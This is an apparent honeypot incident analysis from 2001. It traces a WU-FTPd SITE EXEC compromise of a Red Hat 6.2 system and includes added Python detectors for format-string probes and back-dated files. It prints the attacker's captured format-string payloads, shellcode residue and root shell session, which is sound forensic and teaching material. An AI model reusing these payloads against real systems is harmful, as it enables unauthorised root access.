Intrusion Detection Analysis

Honeynet Project Scan 19

 

October 20, 2001

Document Status v. 1

Matthew M. Shannon MCSE, MCDBA

Table Of Contents

Table of Contents
Requirements
Methodology and Tools Used
Event Summary
Recommendation
Event Analysis
    Event Sequence
    Findings
Appendix
    Recovered Files
    Additional Information
    Touch() Manual Page


Requirements

 

On September 16th a Redhat Linux 6.2 honeypot was compromised. This is the 3rd time this system was compromised by the same intruder. The honeynet is VMware based and uses a modified bash to log to syslog. Syslog is remotely logging to 0.0.0.0 (remote syslog server IP has been replaced). The compromised system has an IP of 192.168.1.102. After successfully breaking into the box, the attacker ended up using 3 modes of connecting and running commands (some of which are encrypted). The attacker also tried to hide some of his edits from the MAC times.

 

 

  1. Which vulnerability did the intruder exploit?
  2. What ways, and in what order, did the intruder use to connect and run commands on the system?
  3. How did the intruder try to hide his edits from the MAC times?
  4. The intruder downloaded Rootkits, what were they called? Are they new/custom Rootkits?
  5. Recover (tell how you did it too) the Rootkits from the snort binary capture
  6. What does the Rootkit do to hide the presence of the attacker on the system?
  7. What did you learn from this exercise?
  8. How long did this challenge take you?

 

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.

 

 

 

Methodology and Tools Used

 

In order to decode the packets and analyze the intrusion, the analyst used a copy of Ethereal (www.ethereal.com). Ethereal has the ability to selectively decode TCP streams and save them as ASCII text. This feature, combined with many others, made short work of analyzing the packet streams. In order to determine the types of attacks, the packet stream was also run through Snort (www.snort.org), an open-source Intrusion Detection System (IDS). Snort provided further information on the types of attacks that were attempted. Lastly, the provided Syslog file further clarified the chain of events.

Event Summary

 

On September 16th a Red Hat Linux 6.2 server was compromised. The intruder made use of a well-known FTP overflow exploit (http://www.cert.org/advisories/CA-2000-13.html). Following the success of the exploit the intruder created two user IDs for future access. The intruder then reconnected using the newly created user IDs and established a file download from a remote server.

The purpose of the download is to obtain a specialized toolkit used to replace key system files and create a backdoor for easy re-entry. During the course of the attack and occupation, the intruder proceeded to make multiple connections to and from external machines via encrypted and unencrypted channels.

 

Recommendation

 

As part of a sound Information Security program, we recommend that an Information Security Policy be developed and used to ensure strong controls, both preventive and corrective, going forward. The Information Security policy would address the need to maintain accurate and timely backups, provide procedures for the timely application of system updates and patches, and remove informative banners from login prompts.

Through preparation and planning the risks associated with computer usage can be addressed and mitigated.

Event Analysis

Event Sequence

 

Failed Telnet Session

Source Information

Date/Time(Start/End): 2001-09-16 19:53:10/19:54:00

Elapsed Time: 50 Seconds

IP Address: 217.156.93.166

Location Name: MIDO-IMPEX

Address: S.C. MIDO IMPEX S.R.L.

Address: 9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA

Country: RO

 

Summary

The initial connection attempts received from the intruder are puzzling at first glance. The intruder attempts a sequence of user names and passwords that do not resemble typical usernames. Our assumption is that the intruder feels he has previously compromised this system and is attempting to reconnect using previously created user names and passwords.

We find this to be true. Based on information provided by the Honeynet Project, we know that the intruder compromised this machine in the past. Therefore, his attempts to log in represent formerly valid user IDs on a typical compromised system.

The failed login attempt prompts him to attempt to re-establish control on the machine.

 

ASCII Source

'



#'#

P ' 38400,38400' XTERM!

Red Hat Linux release 6.2 (Zoot)

Kernel 2.2.14-5.0 on an i586

!login: nnoobbooddyy

 

Password: ultravirus

 

Login incorrect

 

login: nnoobbooddyy

 

Password: virus

 

Login incorrect

 

login: uuuuccpp

 

Password: Login timed out after 60 seconds

 

 

 

WU-FTP Site Exec Buffer Overflow exploit to compromise system

Source Information

Date/Time(Start/End): 2001-09-16 19:55:45/20:56:14

Elapsed Time: 1 Hour

IP Address: 217.156.93.166

Location Name: MIDO-IMPEX

Address: S.C. MIDO IMPEX S.R.L.

Address: 9 C 5 MARASESTI STREET, 5500, BACAU, ROMANIA

Country: RO

CERT Advisory: http://www.cert.org/advisories/CA-2000-13.html

RedHat Update: http://www.redhat.com/support/errata/RHSA-2000-039-02.html

 

 

Summary

Having determined that the system has FTP running, and finding that the FTP Daemon[1] is WU-FTP, the intruder decided to try the WU-FTP 2.6 Site Exec Buffer Overflow exploit. This exploit overloads the memory buffers used by the FTP Daemon, causing it to crash and yield Root[2] level access.
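As an added example, not part of the original analysis, the Python below scans an FTP control-channel transcript for the tell-tale sign of this attack: a SITE EXEC argument that carries printf-style conversion specifiers, which no ordinary FTP client sends. It assumes the transcript is the interleaved client/server text that Ethereal's "Follow TCP Stream" feature saves; the sample session embedded in the script is constructed for the illustration and mirrors the shape of the captured exchange.

```python
import re
from typing import Dict, List

# Constructed sample FTP control-channel transcript (client and server lines
# interleaved, as Ethereal's "Follow TCP Stream" output presents them). The
# two SITE EXEC lines carry printf-style conversion specifiers; the final
# SITE EXEC is benign and is included for contrast.
SAMPLE_SESSION = """\
220 ns1 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS mozilla@
230 Guest login ok, access restrictions apply.
SITE EXEC %020d|%.f%.f|
200-00000000000000000049|0-2|
SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|
SITE EXEC ls
"""

# One printf conversion: '%', optional flags, optional width, optional
# precision (the digits may be absent, so "%.f" matches), then a
# conversion letter.
FORMAT_SPEC = re.compile(r"%[-+ #0]*\d*(?:\.\d*)?[diouxXeEfFgGcspn]")


def audit_ftp_session(transcript: str) -> List[Dict]:
    """Flag SITE EXEC commands whose argument contains format specifiers.

    Returns one finding per suspicious command: the 1-based transcript line,
    the argument, the number of specifiers, whether the session was an
    anonymous login, and a coarse severity.
    """
    findings: List[Dict] = []
    anonymous = False
    for lineno, raw in enumerate(transcript.splitlines(), start=1):
        line = raw.strip()
        upper = line.upper()
        if upper.startswith("USER "):
            # The vulnerable SITE EXEC path is reachable from a guest login,
            # so an anonymous session preceding the command is worth noting.
            parts = upper.split(None, 1)
            anonymous = len(parts) > 1 and parts[1] in ("FTP", "ANONYMOUS")
            continue
        if not upper.startswith("SITE EXEC"):
            continue
        arg = line[len("SITE EXEC"):].strip()
        specs = FORMAT_SPEC.findall(arg)
        if not specs:
            continue  # an ordinary SITE EXEC argument, nothing to flag
        # "%n" is the specifier that turns a format bug into a memory write,
        # and a long run of specifiers is the stack-walking probe seen in
        # the capture; either is rated high, a short probe medium.
        severity = "high" if ("%n" in arg or len(specs) >= 4) else "medium"
        findings.append({
            "line": lineno,
            "argument": arg,
            "specifiers": len(specs),
            "after_anonymous_login": anonymous,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in audit_ftp_session(SAMPLE_SESSION):
        who = "anonymous" if f["after_anonymous_login"] else "authenticated"
        print(f"line {f['line']:>3} [{f['severity']}] {f['specifiers']} "
              f"specifiers after {who} login: {f['argument']}")
```

Run against the constructed session it reports the two probe lines (medium, then high) and ignores the benign one. The same pattern, a `%` followed by a conversion letter inside a SITE EXEC argument, is what a Snort content rule for this advisory keys on; the script simply makes the check reproducible over a saved stream.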

Root access is the highest level of access on a Unix system. By using Root level privileges, the intruder is able to move through the compromised systems files at will.

After the intruder has finished navigating the file system, he creates accounts for himself, which will be the accounts he will use for future access.

The first account he creates is named Nobody. This account does not have root level access, and it is no different from any existing user account. The second account he creates is named dns. This account has root level access. The most likely reason for naming the root level account dns is to hide it among other system accounts: since DNS[3] is a common service provided by Unix machines, it stands to reason that a system account named dns could exist. The most likely reason for creating two accounts is to allow the intruder to telnet back to the system using the non-root ID and then switch, or su[4], to the root ID.

In order to hide the file edits needed to create the user accounts, the intruder uses the touch[5] command, which allows him to alter the dates associated with changes to the user files.
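As an added check, not part of the original report, the Python below shows the trace that touch leaves behind. touch can set a file's access and modification times to any value, but the kernel records that change by advancing the inode change time (ctime) to the present, so a modification time far older than the change time is exactly the residue a back-dated file carries. The scratch files and the thirty-day offset are constructed for the demonstration.

```python
import os
import tempfile
import time
from dataclasses import dataclass
from typing import Iterable, List


@dataclass
class Backdated:
    path: str
    mtime: float   # what touch -t / touch -r can set
    ctime: float   # inode change time, advanced by the kernel on every touch


def find_backdated(paths: Iterable[str], min_gap_seconds: float = 3600.0) -> List[Backdated]:
    """Return files whose mtime lies more than min_gap_seconds before ctime.

    touch(1) rewrites atime and mtime through utime(2); the kernel notes that
    change by setting ctime to the current time. ctime also moves on chmod,
    chown and rename, so a hit is a lead to confirm, not proof of tampering.
    """
    hits: List[Backdated] = []
    for p in paths:
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            continue
        if st.st_ctime - st.st_mtime > min_gap_seconds:
            hits.append(Backdated(p, st.st_mtime, st.st_ctime))
    return hits


def run_demo() -> List[Backdated]:
    """Constructed demonstration in a scratch directory.

    One file is written and then back-dated thirty days with os.utime (the
    same call touch uses); a second file is written and left alone. Only the
    back-dated file should be reported.
    """
    with tempfile.TemporaryDirectory() as tmp:
        backdated = os.path.join(tmp, "passwd.constructed")
        with open(backdated, "w") as fh:
            fh.write("constructed sample content\n")
        thirty_days_ago = time.time() - 30 * 86400
        os.utime(backdated, (thirty_days_ago, thirty_days_ago))

        untouched = os.path.join(tmp, "group.constructed")
        with open(untouched, "w") as fh:
            fh.write("constructed sample content\n")

        return find_backdated([backdated, untouched])


if __name__ == "__main__":
    for hit in run_demo():
        print(f"{hit.path}: mtime {time.ctime(hit.mtime)} "
              f"but ctime {time.ctime(hit.ctime)}")
```

On a real image, feed find_backdated the files an intruder typically edits (the account database under /etc, login-related binaries) and corroborate any hit with the package manager's own verification (rpm -V on a Red Hat system), which compares the file against the installed package's recorded size, checksum and mtime.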

 

ASCII Source

 

220 ns1 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.

USER ftp

331 Guest login ok, send your complete e-mail address as password.

PASS mozilla@

230 Guest login ok, access restrictions apply.

SITE EXEC %020d|%.f%.f|

200-00000000000000000049|0-2|

200 (end of '%020d|%.f%.f|')

SITE EXEC 7 mmmmnnnn%.f%.f%.f%.f%.f%. f%.f|%08x|%08x|

200-7 mmmmnnnn-2-2000-2000000000000000000000000000000000nan00000000-200000000000000000000000000000000000000000000000000000000000000000000000000-2-240nan|bfffdc7e|00000000|

200 (end of '7 mmmmnnnn%.f%. f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f|%08x|%08x|')

 


̀11۰̀0bin0sh1..11

id;

uid=0(root) gid=0(root) groups=50(ftp)

w

4:17am up 3 days, 10:25, 0 users, load average: 0.00, 0.00, 0.00

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

dir

bin dev home lost+found opt root tmp var

boot etc lib mnt proc sbin usr

cd /usr

ls

X11R6

bin

dict

doc

etc

games

i386-redhat-linux

i486-linux-libc5

include

info

kerberos

lib

libexec

local

man

sbin

share

src

tmp

cd local

dir

bin doc etc games info lib man